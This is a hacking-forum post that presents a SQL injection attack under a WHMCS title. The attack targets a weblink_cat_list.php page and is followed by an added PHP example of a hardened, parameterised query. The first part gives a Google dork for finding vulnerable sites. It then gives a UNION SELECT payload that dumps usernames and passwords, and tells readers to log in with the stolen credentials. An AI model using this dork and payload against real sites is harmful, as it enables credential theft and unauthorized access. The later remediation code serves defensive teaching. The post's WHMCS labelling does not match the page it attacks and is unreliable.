WHMCS SQL Injection Vulnerability

Author: MaX-HaCker

WHMCS SQL Injection Vulnerability. This is a very old vulnerability but still works.

Let's start.

First, find a vulnerable site by using a Google dork:
inurl:"weblink_cat_list.php?bcat_id="
The URL will be something like this:

http://www.example.com/oldweb_kroobannok/weblink_cat_list.php?bcat_id=1
Then change the URL from

http://www.example.com/oldweb_kroobannok/weblink_cat_list.php?bcat_id=1 

to

http://www.example.com/oldweb_kroobannok/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user

Bang! All usernames as well as passwords will be shown. Now log in with those credentials.
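
The request above succeeds because the bcat_id value reaches the SQL statement as raw text. The following is an added example, not code from the original article or from the affected application, showing the same kind of lookup hardened with integer validation and a bound parameter. The weblink table, its columns, the linksForCategory() function and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
// Added example: hardened lookup for an integer "bcat_id" parameter.
// Table "weblink" and its columns are hypothetical; the data is constructed.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE weblink (id INTEGER, bcat_id INTEGER, title TEXT, url TEXT)');
$pdo->exec("INSERT INTO weblink VALUES (1, 1, 'Docs', 'https://docs.example.com')");

// Vulnerable pattern (shown for contrast, never executed): request text becomes SQL.
//   $sql = "SELECT id, title, url, bcat_id FROM weblink WHERE bcat_id = " . $_GET['bcat_id'];

function linksForCategory(PDO $pdo, string $raw): ?array
{
    // 1. Allow-list: the parameter must be a positive integer and nothing else.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // caller should answer with HTTP 400
    }
    // 2. Bind the value; it can never change the structure of the statement.
    $stmt = $pdo->prepare('SELECT id, title, url FROM weblink WHERE bcat_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal request and the tampered value from the article
// (the "+" characters in the URL decode to spaces).
$inputs = ['1', '-1 UNION SELECT 1,GROUP_concat(id,0x3a,username,0x3a,password),3,4 from user'];
foreach ($inputs as $raw) {
    $rows = linksForCategory($pdo, $raw);
    echo $rows === null ? "rejected (400)\n" : count($rows) . " row(s)\n";
}
```

Storing passwords with password_hash() and giving the web application's database account access only to the tables it needs limit what is exposed if an injectable query is missed.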

Category: Exploits and Vulnerabilities | Added by: MaX-HaCker (12.08.25)
WWW.GeniusHackers.NET © 2024